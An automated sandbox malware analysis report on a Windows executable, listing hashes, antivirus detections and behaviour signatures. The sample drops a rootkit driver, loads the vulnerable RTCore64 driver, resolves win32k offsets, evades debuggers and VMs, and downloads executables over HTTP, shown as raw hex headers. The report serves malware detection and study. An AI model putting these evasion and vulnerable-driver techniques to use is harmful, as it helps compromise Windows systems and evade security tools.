Windows Analysis Report
lUAc7lqa56.exe

Overview

General Information

Sample name: lUAc7lqa56.exe
renamed because original name is a hash value
Original sample name: 4c428e14cf5fc2c5e54ba377389c8253.exe
Analysis ID: 1541826
MD5: 4c428e14cf5fc2c5e54ba377389c8253
SHA1: bb3972cfb6adc178d8fd17dde519d15a6471e4b9
SHA256: f142f2fefbbd174fbc0d3d6cbe4cb5caa48389dfce9ee63f10d82b503e705468
Tags: 64exe
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Accesses win32k, likely to find offsets for exploits
Detected VMProtect packer
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Sample is not signed and drops a device driver
Tries to detect debuggers (CloseHandle check)
Tries to detect virtualization through RDTSC time measurements
Tries to evade analysis by execution special instruction (VM detection)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to load drivers
Contains functionality to query locales information (e.g. system language)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Creates or modifies windows services
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables driver privileges
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Spawns drivers
Uses a known web browser user agent for HTTP communication

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: lUAc7lqa56.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\driverfo[1].sys Avira: detection malicious, Label: RKIT/Agent.ykqds
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Vulnerability[1].exe Avira: detection malicious, Label: TR/Crypt.Agent.czxpy
Source: C:\Windows\Vulnerability.exe Avira: detection malicious, Label: TR/Crypt.Agent.czxpy
Source: C:\Windows\driverfo.sys Avira: detection malicious, Label: RKIT/Agent.ykqds
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Vulnerability[1].exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\driverfo[1].sys ReversingLabs: Detection: 33%
Source: C:\Windows\Vulnerability.exe ReversingLabs: Detection: 55%
Source: C:\Windows\driverfo.sys ReversingLabs: Detection: 33%
Multi AV Scanner detection for submitted file
Source: lUAc7lqa56.exe ReversingLabs: Detection: 37%
Source: lUAc7lqa56.exe Virustotal: Detection: 29% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Vulnerability[1].exe Joe Sandbox ML: detected
Source: C:\Windows\Vulnerability.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: lUAc7lqa56.exe Joe Sandbox ML: detected
Source: lUAc7lqa56.exe, 00000000.00000002.1934985033.00007FF79005B000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_50b8f276-7

Exploits
barindex
Accesses win32k, likely to find offsets for exploits
Source: C:\Windows\Vulnerability.exe File opened: C:\Windows\System32\win32k.sys Jump to behavior
Source: unknown HTTPS traffic detected: 104.26.0.5:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: lUAc7lqa56.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb. source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb0 source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb - unmatched source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb2u.dllK source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C200000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\wasy\x64\Release\RTCore64_Vulnerability-main\x64\Release\RTCore64_Vulnerability.pdb source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbAy> source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\os\obj\amd64fre\onecoreuap\windows\core\kmode\moderncore\objfre\amd64\typeinfo\win32k.pdb source: Vulnerability.exe, 00000004.00000003.1878962418.000002181E231000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879045308.000002181DC7C000.00000004.00000020.00020000.00000000.sdmp, AB6E94A2098C7E1ADF1A0B7B18448F0D6B5F55AA62BB62760C12A51161058F4B00[1].blob.4.dr, 74b74f1f14570c9cf7868ff6d4bda773.pdb.4.dr
Source: Binary string: Unknown exceptionbad array new lengthstring too longbad cast%02xsymbols\.pdb/\\\.\RTCore64user32.dllwin32u.dllsystemroot\System32\win32k.syshttps://msdl.microsoft.com/download/symbols[-] Failed to Load PDBNtUserSetGestureConfig[-] Failed to Load Symbol of NtUserSetGestureConfig[<] Loading vulnerable driver, Name: [-] Can't find TEMP folder[-] Failed to create vulnerable driver file[-] Failed to register and start service for the vulnerable driver[-] Failed to load driver rtcore64.sysntoskrnl.exe[-] Failed to get ntoskrnl.exewin32k.sys[-] win32k.sys not foundxxxH source: lUAc7lqa56.exe, 00000000.00000003.1796890061.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881228820.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880399638.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879638400.000002181DC7A000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881318765.000002181DC7A000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880040885.000002181DC7A000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879912102.000002181DB3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5 source: Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Hostmsdl.microsoft.comGET /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb HTTP/1.1 source: Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbZ source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbY source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880187140.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C279000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /win32k.pdb" source: Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbiz source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rosoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb3.pdb % source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000003.1878741691.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880515250.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C279000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881137135.000002181DAC4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\wasy\x64\Release\RTCore64_Vulnerability-main\x64\Release\RTCore64_Vulnerability.pdb33 source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbK source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C200000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb_ source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C200000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb!x source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb!y source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5n source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: GET /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb HTTP/1.1 source: Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbYz source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pC:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb)y source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\ioctl base updated by redshirtfan\build\driver\driver.pdb source: lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798931127.00000245E10C0000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1799010054.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.dr
Source: Binary string: win32k.pdbGCTL source: Vulnerability.exe, 00000004.00000003.1879106664.000002181DBE1000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C225000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb@ source: Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bad cast%02xsymbols\.pdb/\\\.\RTCore64user32.dllwin32u.dllsystemroot\System32\win32k.syshttps://msdl.microsoft.com/download/symbols[-] Failed to Load PDBNtUserSetGestureConfig[-] Failed to Load Symbol of NtUserSetGestureConfig[<] Loading vulnerable driver, Name: [-] Can't find TEMP folder[-] Failed to create vulnerable driver file[-] Failed to register and start service for the vulnerable driver[-] Failed to load driver rtcore64.sysntoskrnl.exe[-] Failed to get ntoskrnl.exewin32k.sys[-] win32k.sys not foundxxxH source: lUAc7lqa56.exe, 00000000.00000003.1796909009.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1796945638.00000245E1041000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1797006532.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: win32k.pdb source: Vulnerability.exe, 00000004.00000003.1879106664.000002181DBE1000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C225000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols4b74f1f14570c9cf7868ff6d4bda773.pdb - unmatched source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5zs source: Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb7 source: Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbm]g source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880187140.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C279000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pC:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb1y. source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pC:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ddhttps://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000003.1878741691.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880515250.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881137135.000002181DAC4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rosoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ConnectionKeep-Alive/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c9cf7868ff6d4bda773.pdbv source: Vulnerability.exe, 00000004.00000002.1881228820.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880399638.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879912102.000002181DB3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb;k source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbFranciscw source: Vulnerability.exe, 00000004.00000002.1881228820.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880399638.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879912102.000002181DB3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb\ source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC423B60 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort, 4_2_00007FF7CC423B60
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 25 Oct 2024 06:10:12 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 03 Oct 2024 17:41:18 GMTETag: "23800-623960fde9891"Accept-Ranges: bytesContent-Length: 145408Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7d e7 f2 38 39 86 9c 6b 39 86 9c 6b 39 86 9c 6b 30 fe 0f 6b 2f 86 9c 6b 3f 07 98 6a 33 86 9c 6b 3f 07 9f 6a 3d 86 9c 6b 3f 07 99 6a 1b 86 9c 6b 3f 07 9d 6a 3f 86 9c 6b 72 fe 9d 6a 28 86 9c 6b 39 86 9d 6b 31 87 9c 6b 56 07 95 6a 3e 86 9c 6b 56 07 63 6b 38 86 9c 6b 56 07 9e 6a 38 86 9c 6b 52 69 63 68 39 86 9c 6b 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 3e d7 fe 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 26 00 4e 01 00 00 ee 00 00 00 00 00 00 b4 48 01 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 02 00 00 04 00 00 00 00 00 00 03 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 06 02 00 cc 01 00 00 00 50 02 00 e8 01 00 00 00 40 02 00 30 0f 00 00 00 00 00 00 00 00 00 00 00 60 02 00 08 01 00 00 b0 d7 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 d8 01 00 28 00 00 00 70 d6 01 00 40 01 00 00 00 00 00 00 00 00 00 00 00 60 01 00 10 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 93 4c 01 00 00 10 00 00 00 4e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 cb 00 00 00 60 01 00 00 cc 00 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f0 0c 00 00 00 30 02 00 00 06 00 00 00 1e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 30 0f 00 00 00 40 02 00 00 10 00 00 00 24 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e8 01 00 00 00 50 02 00 00 02 00 00 00 34 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 08 01 00 00 00 60 02 00 00 02 00 00 00 36 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 25 Oct 2024 06:10:12 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Sat, 19 Oct 2024 00:07:08 GMTETag: "4d00-624c93353bec7"Accept-Ranges: bytesContent-Length: 19712Keep-Alive: timeout=5, max=99Connection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 11 41 b6 a6 55 20 d8 f5 55 20 d8 f5 55 20 d8 f5 55 20 d8 f5 54 20 d8 f5 1e 58 d9 f4 56 20 d8 f5 55 20 d9 f5 4e 20 d8 f5 1e 58 db f4 53 20 d8 f5 1e 58 dc f4 50 20 d8 f5 3a a1 dd f4 54 20 d8 